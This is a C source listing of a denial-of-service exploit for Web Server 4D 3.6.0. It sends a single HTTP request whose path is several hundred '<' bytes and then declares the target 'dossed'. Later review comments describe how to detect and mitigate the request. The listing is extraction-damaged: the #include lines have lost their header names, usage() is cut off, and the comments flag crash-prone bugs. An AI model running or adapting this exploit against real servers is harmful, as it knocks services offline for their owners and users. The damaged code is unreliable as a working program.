/*
 * Web server 4D 3.6.0 denial of service
 * bug found by badpack3t.
 * ftp://ftp.mdgcs.com/demos/WS4D/Win/WS4D_3.6.0_Full.exe
 *
 * $ gcc -o f_ws4d f_ws4d.c (linux version)
 * $ gcc -o f_ws4d f_ws4d.c -DWINDOWS (windows version)
 *
 * $ ./f_ws4d
 *
 * Federico Fazzi
 *
 * What the listing does: it opens one TCP connection to the host and port
 * given on the command line, writes the fixed byte string f_call to it and
 * exits. It never reads a reply from the server.
 *
 * NOTE(review): this page is extraction-damaged. The header name after every
 * #include is missing, and the usage() definition at the bottom is cut off
 * mid-string. Both are kept exactly as found.
 */

/* Header names were lost in extraction; the bare directives are kept as found. */
#include
#include
#include

#if WINDOWS
#include
#pragma comment(lib, "ws2_32.lib")
#else
#include
#include
#include
#include
#include
#endif

/* Forward declaration; the definition is at the end of the listing. */
int usage(char *f);

/*
 * The request written to the server, spelled as hex escapes:
 * "GET /" followed by a run of several hundred 0x3C ('<') bytes and then
 * " HTTP/1.1 " (0x20 at the end). The array holds no CR/LF and no header
 * lines.
 *
 * For detection and mitigation: the recognisable trait is a request line
 * whose URI is one byte value repeated far beyond any normal path length.
 * A request-line / URI length limit on a reverse proxy or filter in front of
 * the affected server rejects such a request before it reaches the server.
 * The page does not say where in the server the failure occurs or which
 * release fixes it.
 */
char f_call[] =
    "\x47\x45\x54\x20\x2F\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
    "\x3C\x3C\x3C\x3C\x3C\x20\x48\x54\x54\x50\x2F\x31\x2E\x31\x20";

/*
 * Entry point: resolve argv[1], connect over TCP to the port in argv[2],
 * write f_call once, print status lines and close the socket.
 *
 * Returns 0 after the write succeeds, -1 if WSAStartup fails (Windows build);
 * socket, connect and write failures call exit(1).
 */
int main(int argc, char *argv[]) {

#if WINDOWS
    WSADATA wsaData;
    WORD wVersionRequested;
    int port;
    int size;
    SOCKET sockfd;
#else
    int sockfd;
    socklen_t size;
    /* NOTE(review): argv[2] is read here, before argc is checked below. */
    in_port_t port = atoi(argv[2]);
#endif

    struct sockaddr_in structaddr;
    struct hostent *sockhost;
    /* NOTE(review): reply is allocated but not used or freed anywhere in the visible code. */
    char *reply = (char *)malloc(512);

    /* NOTE(review): only argc < 2 is rejected, yet both argv[1] and argv[2] are used. */
    if(argc < 2)
        usage((char *) basename(argv[0]));

#if WINDOWS
    /* Winsock must be initialised before any socket call; version 1.1 is requested. */
    wVersionRequested = MAKEWORD(1, 1);
    if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
#endif

    printf("* Webserver 4D 3.6.0 denial of service\n\n");

    /* One TCP socket; the two branches differ only in the failure sentinel. */
#if WINDOWS
    if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
        perror("socket_func");
        exit(1);
    }
#else
    if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket_func");
        exit(1);
    }
#endif

    printf("getting socket.. done!\n");

    sockhost = gethostbyname(argv[1]);
    /* NOTE(review): a failed lookup is only reported; sockhost is still dereferenced below. */
    if(sockhost == NULL)
        herror("gethostbyname_func");

    /* Build the IPv4 destination address from the first resolved address. */
    size = sizeof(structaddr);
    memset((void *) &structaddr, 0x00, size);
    bcopy(sockhost->h_addr, &structaddr.sin_addr, sockhost->h_length);

    structaddr.sin_family = AF_INET;
    structaddr.sin_port = htons((u_short)port);

    printf("getting connection.. ");

    if(connect(sockfd, (struct sockaddr *) &structaddr, size) == -1) {
        printf("error!\n");
        perror("connect_func");
        exit(1);
    }

    printf("done!\n");

    printf("sending exploit in hex format.. ");

    /*
     * sizeof(f_call) counts the array's terminating NUL, so the bytes on the
     * wire end with a space followed by 0x00 and no CR/LF. That trailer is a
     * second observable trait of this request, next to the over-long URI.
     */
    if(write(sockfd, f_call, sizeof(f_call)) == -1) {
        printf("error!\n");
        perror("send_func");
        exit(1);
    }

    printf("done!\n");
    /*
     * Printed whenever write() succeeds. No response is read, so this line
     * does not confirm any effect on the server.
     */
    printf("target: %s on port %d have been dossed!\n\n", sockhost->h_name, port);

#if WINDOWS
    closesocket(sockfd);
#else
    close(sockfd);
#endif

    return(0);

}

/* usage() is cut off at the end of this listing; the visible part is kept as found. */
int usage(char *f) {
    printf("Webserver 4D 3.6.0 denial of service\n");
    printf("Federico Fazzi